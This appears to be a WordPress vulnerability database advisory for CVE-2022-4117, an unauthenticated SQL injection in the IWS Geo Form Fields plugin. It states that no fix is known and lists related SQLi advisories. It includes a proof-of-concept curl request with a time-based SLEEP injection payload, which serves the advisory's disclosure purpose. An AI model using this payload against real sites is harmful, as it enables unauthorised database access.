IWS – Geo Form Fields <= 1.0 – Unauthenticated SQLi | CVE 2022-4117 | Plugin Vulnerabilities

Description

The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.

Proof of Concept

Invoke the following curl command, which will induce a 5s delay:

time curl 'https://example.com/wp-admin/admin-ajax.php?action=iws_gff_fetch_states' --data 'country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)'

Affects Plugins

iws-geo-form-fields

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

1fac3eb4-13c0-442d-b27c-7b7736208193

Timeline

Publicly Published

2022-11-30 (about 3 years ago)

Added

2022-11-30 (about 3 years ago)

Last Updated

2022-11-30 (about 3 years ago)

Other

Published

Title

Published

2024-10-31

Title

Download-Mirror-Counter <= 1.1 - Authenticated (Contributor+) SQL Injection

Published

2023-10-30

Title

Image vertical reel scroll slideshow < 9.1 - Authenticated (Subscriber+) SQL Injection via Shortcode

Published

2025-02-19

Title

LTL Freight Quotes – GlobalTranz Edition < 2.3.12 - Unauthenticated SQL Injection

Published

2024-04-12

Title

BWL Advanced FAQ Manager < 2.0.4 - Authenticated (Administrator+) SQL Injection

Published

2021-01-18

Title

301 Redirects - Easy Redirect Manager < 2.51 - Authenticated SQL Injection